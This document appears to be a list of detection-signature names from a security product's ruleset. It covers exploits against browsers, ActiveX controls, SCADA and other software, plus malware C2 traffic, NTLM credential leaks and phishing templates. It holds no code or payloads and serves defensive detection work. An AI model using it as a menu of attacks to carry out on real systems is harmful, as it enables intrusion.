File-Text_Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting
File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization
File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2
File-Text_Microsoft-Sharepoint-Workflow-Workflowcodetypereferenceexpression-Insecure-Deserialization
File-Text_Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
File-Text_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
File-Text_Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free
File-Text_Microsoft-Text-To-Speech-CVE-2018-8634
File-Text_Microsoft-Time-Remote-Code-Execution-CVE-2011-3397
File-Text_Microsoft-VBScript-RCE-CVE-2018-8174
File-Text_Microsoft-VBScript-RCE-CVE-2018-8174-2
File-Text_Microsoft-VBScript-Scripting-Engine-CVE-2014-6363
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Visual-Foxpro-Vfp6r-Docmd-ActiveX-Control-Command-Execution
File-Text_Microsoft-Visual-Studio-Code-Markdown-Preview-Enhanced-Extension-Command-Injection
File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection
File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution
File-Text_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
File-Text_Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage
File-Text_Microsoft-VM-ActiveX-Component-Vulnerability
File-Text_Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
File-Text_Microsoft-Windows-ActiveX-Data-Objects-Code-Execution
File-Text_Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
File-Text_Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption
File-Text_Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563
File-Text_Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability
File-Text_Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize
File-Text_Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
File-Text_Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189-2
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219-2
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268
File-Text_Microsoft-Windows-Media-Center-MCL-File-Code-Execution
File-Text_Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Windows-Media-Player-1-CVE-2010-2745
File-Text_Microsoft-Windows-Media-Player-2-CVE-2010-2745
File-Text_Microsoft-Windows-Media-Player-File-Information-Disclosure
File-Text_Microsoft-Windows-Media-Player-Media-Library-Manipulation
File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2
File-Text_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-Text_Microsoft-Windows-OLE-CVE-2014-6332
File-Text_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
File-Text_Microsoft-Windows-Script-Engine-Information-Disclosure-CVE-2011-0031
File-Text_Microsoft-Windows-Scripting-Engines-Script-Encoding
File-Text_Microsoft-Windows-Search-Protocol-Handler-Command-Execution
File-Text_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
File-Text_Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay
File-Text_Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay
File-Text_Microsoft-Windows-URI-Handler-Remote-Code-Execution
File-Text_Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free
File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution
File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution-2
File-Text_Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure
File-Text_Microsoft-Windows-Vista-Windows-Mail-File-Execution
File-Text_Microsoft-Windows-Win32k.sys-Memory-Corruption
File-Text_Microsoft-Windows-Windows-Script-Host-Command-Injection
File-Text_Microsoft-Windows-Winhlp32-Item-Buffer-Overflow
File-Text_Microsoft-Windows-XP-Large-Image-Resize-DoS
File-Text_Microsoft-WMI-Administrative-Tools-ActiveX-Control
File-Text_Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
File-Text_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
File-Text_Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033
File-Text_Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability
File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution
File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution-With-Open
File-Text_Microsoft-XML-Core-Services-CVE-2017-0024
File-Text_Microsoft-Xml-Core-Services-Msxml-Header-Information-Disclosure
File-Text_Microsoft-Xml-Core-Services-ParseError-DOM-Object-Disclosure
File-Text_Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability
File-Text_Microsoft-Xml-Core-Services-Vulnerable-ActiveX-Control
File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810
File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812
File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860
File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592
File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770
File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771
File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990
File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002
File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023
File-Text_Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366
File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219
File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609
File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806
File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926
File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940
File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052
File-Text_Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857
File-Text_Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367
File-Text_Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801
File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380
File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570
File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959
File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257
File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296
File-Text_Mime-Formatted-Request-Vulnerability-CVE-2011-1894
File-Text_Mini-Stream-Ripper-Buffer-Overflow
File-Text_MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
File-Text_mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
File-Text_mIRC-URI-Handler-Remote-Code-Execution
File-Text_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
File-Text_Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow
File-Text_Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow
File-Text_Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability
File-Text_Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow
File-Text_Monkif-Bot-Traffic
File-Text_MONSOON-CnC-Traffic
File-Text_MOVEit-Transfer-SQL-Injection-Post-Exploit
File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution-2
File-Text_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
File-Text_Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
File-Text_Mozilla-Command-Line-Url-Command-Execution
File-Text_Mozilla-CSS-Border-Memory-Corruption
File-Text_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
File-Text_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
File-Text_Mozilla-Firefox-Browser-Engine-Memory-Corruption
File-Text_Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass
File-Text_Mozilla-Firefox-Character-Processing-Cross-Site-Scripting-CVE-2008-4065
File-Text_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
File-Text_Mozilla-Firefox-Chrome-URL-Information-Disclosure
File-Text_Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
File-Text_Mozilla-Firefox-Constructframe-Memory-Corruption
File-Text_Mozilla-Firefox-Createimagebitmap-Integer-Overflow
File-Text_Mozilla-Firefox-Cross-Domain-Information-Disclosure
File-Text_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
File-Text_Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation
File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2
File-Text_Mozilla-Firefox-Domnoderemoved-Memory-Corruption
File-Text_Mozilla-Firefox-enablePrivilege-Vulnerable-Function
File-Text_Mozilla-Firefox-Event-Handler-Privilege-Escalation-CVE-2007-3737
File-Text_Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
File-Text_Mozilla-Firefox-Floating-Layer-Column-Layout-DoS
File-Text_Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
File-Text_Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read
File-Text_Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution
File-Text_Mozilla-Firefox-Information-Disclosure-CVE-2013-1675
File-Text_Mozilla-Firefox-InstallTrigger-DoS
File-Text_Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
File-Text_Mozilla-Firefox-JavaScript-Deleted-Frame-Reference-CVE-2006-3801
File-Text_Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
File-Text_Mozilla-Firefox-JavaScript-HTML-Escaped-Low-Surrogate-Characters-CVE-2008-4066
File-Text_Mozilla-Firefox-JavaScript-Large-Regexp-Parsing-Memory-Corruption-CVE-2006-1737
File-Text_Mozilla-Firefox-Jit-Code-Allocation
File-Text_Mozilla-Firefox-Jit-Compiler-Type-Confusion
File-Text_Mozilla-Firefox-LookupUCProperty-Memory-Corruption
File-Text_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-Text_Mozilla-Firefox-Navigator-Remote-Code-Execution
File-Text_Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
File-Text_Mozilla-Firefox-nsTreeRange-Use-After-Free
File-Text_Mozilla-Firefox-Object-Mchannel-Use-After-Free
File-Text_Mozilla-Firefox-Object-Tag-Null-Dereference
File-Text_Mozilla-Firefox-onreadystatechange-Use-After-Free
File-Text_Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing
File-Text_Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
File-Text_Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
File-Text_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
File-Text_Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802
File-Text_Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal
File-Text_Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free
File-Text_Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution
File-Text_Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079
File-Text_Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption
File-Text_Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404
File-Text_Mozilla-Firefox-Tag-Order-Memory-Corruption
File-Text_Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free
File-Text_Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
File-Text_Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
File-Text_Mozilla-Firefox-Unicode-Data-Denial-Of-Service
File-Text_Mozilla-Firefox-URI-Handling-Vulnerability
File-Text_Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
File-Text_Mozilla-Firefox-Webassembly-Table-Integer-Underflow
File-Text_Mozilla-Firefox-WebGL-Integer-Overflow
File-Text_Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service
File-Text_Mozilla-Firefox-Xmlserializer-Use-After-Free
File-Text_Mozilla-Firefox-Xraywrapper-Policy-Bypass
File-Text_Mozilla-IDN-Encoded-Hostname-BOF
File-Text_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
File-Text_Mozilla-Multiple-Products-Table-Frames-Memory-Corruption
File-Text_Mozilla-Non-Ascii-Hostname-BOF
File-Text_Mozilla-Products-Animation-Timeline-Use-After-Free
File-Text_Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
File-Text_Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
File-Text_Mozilla-Products-IDN-Spoofing-Vulnerability
File-Text_Mozilla-Products-MathML-Integer-Overflow
File-Text_Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow
File-Text_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
File-Text_Mozilla-Products-QueryInterface-Method-Memory-Corruption
File-Text_Mozilla-Products-Regular-Expressions-Heap-Corruption
File-Text_Mozilla-Shell-Protocol-Validation
File-Text_Mozilla-Soapparameter-Integer-Overflow-Vulnerability
File-Text_Mozilla-Suite-DOM-Property-Code-Execution
File-Text_Mozilla-Thunderbird-Iframe-JavaScript-Execution
File-Text_MPack-JavaScript-Decoder
File-Text_MS-appinstaller-URI-Scheme-Link-In-HTML
File-Text_MS-Exchange-URL-Redirection-CVE-2014-6336
File-Text_MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
File-Text_MS-Ie-Async-Null-Object-Access-Remote-Code-Execution
File-Text_MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289
File-Text_MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526
File-Text_MS-Ie-Style-Tag-Comment-DoS
File-Text_MS-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS
File-Text_MS-Internet-Explorer-CVE_2012-1889
File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270
File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276
File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278
File-Text_MS-Internet-Explorer-Select-Element-Remote-Code-Execution
File-Text_MS-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964
File-Text_MS-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
File-Text_MS-Rich-Textbox-Control-Insecure-Method-Arbitrary-File-Overwrite
File-Text_MS-Search-URI-Scheme-Link-In-HTML
File-Text_MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
File-Text_MS-Windows-Msxml-Information-Disclosure-Vulnerability
File-Text_MS-XML-Remote-Code-Execution-CVE-2018-8420
File-Text_MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567
File-Text_MSIE-JSON-Array-Information-Disclosure-Vulnerability
File-Text_MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193
File-Text_MSWebDVD-Class-Null-Pointer-Assignment
File-Text_Mujahideen-Secrets-Key-File
File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerabilities
File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerability-2
File-Text_Multiple-Browser-Long-Unicode-DoS-Memory-Corruption
File-Text_Multiple-Browser-Marquee-DoS-Memory-Corruption
File-Text_Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability
File-Text_Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure
File-Text_MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow
File-Text_MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
File-Text_MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow
File-Text_MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow
File-Text_mySCADA-myPRO-CVE-2023-28384-Command-Injection
File-Text_mySCADA-myPRO-CVE-2023-28716-Command-Injection
File-Text_Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248
File-Text_National-Instruments-Installer-ActiveX-Arbitrary-File-Creation
File-Text_NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
File-Text_NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429
File-Text_NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow
File-Text_NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting
File-Text_NodeBB-Socket.io-Elevation-Of-Privilege
File-Text_NodeBB-Socket.io-Eventname-Denial-Of-Service
File-Text_Nodejs-JS-YAML-Load-Code-Execution
File-Text_Non-Standard-Port-In-Iframe-Src-Attribute
File-Text_Norton-AntiVirus-ActiveX-Denial-Of-Service
File-Text_Norton-Internet-Security-Remote-Command-Execution
File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow
File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2
File-Text_Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval
File-Text_Novell-Groupwise-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference
File-Text_Novell-Groupwise-Client-For-Windows-Vulnerable-Method-Usage
File-Text_Novell-Groupwise-Client-Gwmim1.ocx-Untrusted-Pointer-Dereference
File-Text_Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow-2
File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting
File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting-2
File-Text_Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-Target-Frame-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-Vulnerable-Method-Call
File-Text_Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free
File-Text_Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
File-Text_Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF
File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF-2
File-Text_Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-Remote-File-Deletion
File-Text_Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321
File-Text_Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
File-Text_Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow
File-Text_Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution
File-Text_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046
File-Text_NTLM-Hash-Disclosure-CVE-2024-43451
File-Text_NTR-ActiveX-Control-Check-Buffer-Overflow
File-Text_NTR-ActiveX-StopModule-Code-Execution
File-Text_Nymaim-Botnet-Traffic
File-Text_Obfuscated-Evaluated-Script-Content
File-Text_Obfuscated-VBScript-Char-Execute-Detected
File-Text_Obfuscated-VBScript-Detected
File-Text_Obfuscated-VBScript-Inside-JavaScript
File-Text_Obfuscated-VBScript-Shell-Detected
File-Text_Object-Classid-In-Nonstandard-Format
File-Text_October-CMS-Unauthorized-Password-Change-CVE-2021-32648
File-Text_Octopus-C2-Initial-Infection-Traffic
File-Text_Oldrea-Havex-CnC-Response
File-Text_OLE-File-In-Text-File
File-Text_Oleaut32.dll-Remote-Code-Execution-Vulnerability
File-Text_Ollama-Getblobspath-Digest-Directory-Traversal
File-Text_Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-flnet-Version-Heap-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow
File-Text_Omron-Cx-One-Cx-programmer-Program-Use-After-Free
File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow
File-Text_Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow
File-Text_OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
File-Text_OpenNMS-Authenticated-Remote-Code-Execution
File-Text_OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow
File-Text_Opera-10.53-JavaScript-getImageData-Memory-Corruption-Vulnerability
File-Text_Opera-Browser-Document-Writing-Uninitialized-Memory-Access
File-Text_Opera-Browser-File-URI-Handling-Buffer-Overflow
File-Text_Opera-History-Search-Cross-Site-Scripting
File-Text_Opera-JavaScript-Alert-Buffer-Overflow
File-Text_Opera-Suspicious-Preference-Modification
File-Text_Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow
File-Text_Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation
File-Text_Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation
File-Text_Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation
File-Text_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
File-Text_Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
File-Text_Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference
File-Text_Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference
File-Text_Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Dereference
File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities
File-Text_Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference
File-Text_Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Usage
File-Text_Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-ActiveX-Control
File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit
File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
File-Text_Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow
File-Text_Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
File-Text_Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
File-Text_Oracle-Java-Security-Slider-Feature-Bypass
File-Text_Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error
File-Text_Oracle-Java-Web-Start-ActiveX-Control-Vulnerable-Method-Usage
File-Text_Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Code-Execution
File-Text_Oracle-Webcenter-Forms-Recognition-ActiveX-File-Creation
File-Text_Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability
File-Text_Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload
File-Text_Orbit-Downloader-Stack-Based-Buffer-Overflow
File-Text_Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
File-Text_Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
File-Text_Outdated-Browser-Accessing-ActiveX-Object-In-HTML
File-Text_Outdated-Browser-VBScript-Scripting-Detected
File-Text_PAC-Resolver-Remote-Code-Execution
File-Text_Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow
File-Text_Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow
File-Text_Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow
File-Text_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
File-Text_Parse-Server-Databasecontroller-Prototype-Pollution
File-Text_Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396
File-Text_Pastebin-File-Potentially-Containing-Malware-C2-Address
File-Text_PBot-Malware
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-AddPage
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-DeletePage
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-GetExtendedColor
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-LoadObject
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-SaveObject
File-Text_Perl-Obfuscator-Code
File-Text_Persits-Xupload-ActiveX-Buffer-Overflow
File-Text_PGP-Private-Key-File
File-Text_PGP-Public-Key-File
File-Text_Phishing-Script_Detected
File-Text_Phishing-Script_Detected_2
File-Text_Phishing-Template-Detected-1
File-Text_Phishing-Template-Detected-2
File-Text_Phishing-Template-Detected-3
File-Text_Phishing-Template-Detected-4
File-Text_Phishing-Template-Detected-5
File-Text_Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow
